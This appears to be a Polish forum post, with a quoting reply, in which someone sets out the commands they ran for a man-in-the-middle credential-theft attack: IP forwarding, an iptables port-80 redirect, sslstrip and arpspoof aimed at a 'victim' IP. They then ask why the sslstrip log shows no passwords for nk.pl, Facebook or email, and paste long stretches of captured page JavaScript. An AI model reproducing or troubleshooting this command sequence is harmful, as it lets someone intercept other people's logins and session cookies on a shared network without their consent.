sslstrip wywala takie bledy, a w logu sa logi, ale nie ma hasla, np do nk czy facebook'a, poczty
to wykonalem:
* cat /proc/sys/net/ipv4/ip_forward
* echo "1" > /proc/sys/net/ipv4/ip_forward
* cat /proc/sys/net/ipv4/ip_forward
na ten port przekierowalem:
*iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8000
* iptables-save
sslstrip wlaczylem z takim parametrem
sslstrip -a -l 8000
arpspoof'a wlaczylem z takim parametrem
arpspoof -i wlan0 -t ip_ofiary -r ip_router'a
teraz plik sslstrip.log zajmuje okolo 253mega
w wnetrze pliku sslstrip.log wyglada tak:
2014-10-24 00:02:52,329 Got server header: Set-Cookie:nk_session=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
2014-10-24 00:02:52,366 Read from server:
if(typeof(ns_global_vars) === 'undefined'){
ns_global_vars = {};
}
if(ns_global_vars.gummiDetectBrowser === undefined){
ns_global_vars.gummiDetectBrowser = function(){
var ua = navigator.userAgent.toLowerCase();
var makeVersion = function(result){
return parseInt(result[1]) * 1000 + parseInt(result[2]);
}
;
if (function(){
return ua.indexOf('opera') != -1;
}
())
return 'opera';
if (function(){
return ua.indexOf('webkit') != -1;
}
())
return 'safari';
if (function(){
return ua.indexOf('msie') != -1 && document.documentMode >= 10;
}
())
this.each(function(){if(settings.container){var container=$(settings.container)}else{var container=$('<span/>').attr('class','passStrength');$(this).after(con tainer)}$(this).keyup(function(){var val=$(this).val();if(val.length>0){var level=passwordStrength.getStrengthLevel(val,settin gs.minLength,$(settings.username).filter(':visible ').val());var _class='passStrength-'+level;if(!container.hasClass(_class)&&level in settings.texts){container.text(settings.texts[level]).attr('class','passStrength '+_class)}}else{container.text('').attr('class','p assStrength')}})})}})(jQuery);;(function(window,do cument,$){var isOperaMini=Object.prototype.toString.call(window. operamini)=='[object OperaMini]';var isInputSupported='placeholder'in document.createElement('input')&&!isOperaMini;var isTextareaSupported='placeholder'in document.createElement('textarea')&&!isOperaMini;v ar prototype=$.fn;var valHooks=$.valHooks;var propHooks=$.propHooks;var hooks;var placeholder;if(isInputSupported&&isTextareaSupport ed){placeholder=prototype.placeholder=function(){r eturn this;};placeholder.input=placeholder.textarea=true ;}else{placeholder=prototype.placeholder=function( ){var $this=this;$this.filter((isInputSupported?'textare a':':input')+'[placeholder]').not('.placeholder').bind({'focus.placeholder':c learPlaceholder,'blur.placeholder':setPlaceholder} ).data('placeholder-enabled',true).trigger('blur.placeholder');return $this;};placeholder.input=isInputSupported;placeho lder.textarea=isTextareaSupported;hooks={'get':fun ction(element){var $element=$(element);var $passwordInput=$element.data('placeholder-password');if($passwordInput){return $passwordInput[0].value;}
return $element.data('placeholder-enabled')&&$element.hasClass('placeholder')?'':ele ment.value;},'set':function(element,value){var $element=$(element);var $passwordInput=$element.data('placeholder-password');if($passwordInput){return $passwordInput[0].value=value;}
chyba cos sie wysypalo, dziwne to ;/
a ostatni screen pokazuje blad arpspooof, nie wiem czy to normalne
![]()
![]()
![]()
to wykonalem:
Cytat:
* cat /proc/sys/net/ipv4/ip_forward
* echo "1" > /proc/sys/net/ipv4/ip_forward
* cat /proc/sys/net/ipv4/ip_forward
Cytat:
*iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8000
* iptables-save
Cytat:
sslstrip -a -l 8000
Cytat:
arpspoof -i wlan0 -t ip_ofiary -r ip_router'a
w wnetrze pliku sslstrip.log wyglada tak:
Cytat:
2014-10-24 00:02:52,329 Got server header: Set-Cookie:nk_session=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
2014-10-24 00:02:52,366 Read from server:
if(typeof(ns_global_vars) === 'undefined'){
ns_global_vars = {};
}
if(ns_global_vars.gummiDetectBrowser === undefined){
ns_global_vars.gummiDetectBrowser = function(){
var ua = navigator.userAgent.toLowerCase();
var makeVersion = function(result){
return parseInt(result[1]) * 1000 + parseInt(result[2]);
}
;
if (function(){
return ua.indexOf('opera') != -1;
}
())
return 'opera';
if (function(){
return ua.indexOf('webkit') != -1;
}
())
return 'safari';
if (function(){
return ua.indexOf('msie') != -1 && document.documentMode >= 10;
}
())
Cytat:
this.each(function(){if(settings.container){var container=$(settings.container)}else{var container=$('<span/>').attr('class','passStrength');$(this).after(con tainer)}$(this).keyup(function(){var val=$(this).val();if(val.length>0){var level=passwordStrength.getStrengthLevel(val,settin gs.minLength,$(settings.username).filter(':visible ').val());var _class='passStrength-'+level;if(!container.hasClass(_class)&&level in settings.texts){container.text(settings.texts[level]).attr('class','passStrength '+_class)}}else{container.text('').attr('class','p assStrength')}})})}})(jQuery);;(function(window,do cument,$){var isOperaMini=Object.prototype.toString.call(window. operamini)=='[object OperaMini]';var isInputSupported='placeholder'in document.createElement('input')&&!isOperaMini;var isTextareaSupported='placeholder'in document.createElement('textarea')&&!isOperaMini;v ar prototype=$.fn;var valHooks=$.valHooks;var propHooks=$.propHooks;var hooks;var placeholder;if(isInputSupported&&isTextareaSupport ed){placeholder=prototype.placeholder=function(){r eturn this;};placeholder.input=placeholder.textarea=true ;}else{placeholder=prototype.placeholder=function( ){var $this=this;$this.filter((isInputSupported?'textare a':':input')+'[placeholder]').not('.placeholder').bind({'focus.placeholder':c learPlaceholder,'blur.placeholder':setPlaceholder} ).data('placeholder-enabled',true).trigger('blur.placeholder');return $this;};placeholder.input=isInputSupported;placeho lder.textarea=isTextareaSupported;hooks={'get':fun ction(element){var $element=$(element);var $passwordInput=$element.data('placeholder-password');if($passwordInput){return $passwordInput[0].value;}
return $element.data('placeholder-enabled')&&$element.hasClass('placeholder')?'':ele ment.value;},'set':function(element,value){var $element=$(element);var $passwordInput=$element.data('placeholder-password');if($passwordInput){return $passwordInput[0].value=value;}
a ostatni screen pokazuje blad arpspooof, nie wiem czy to normalne
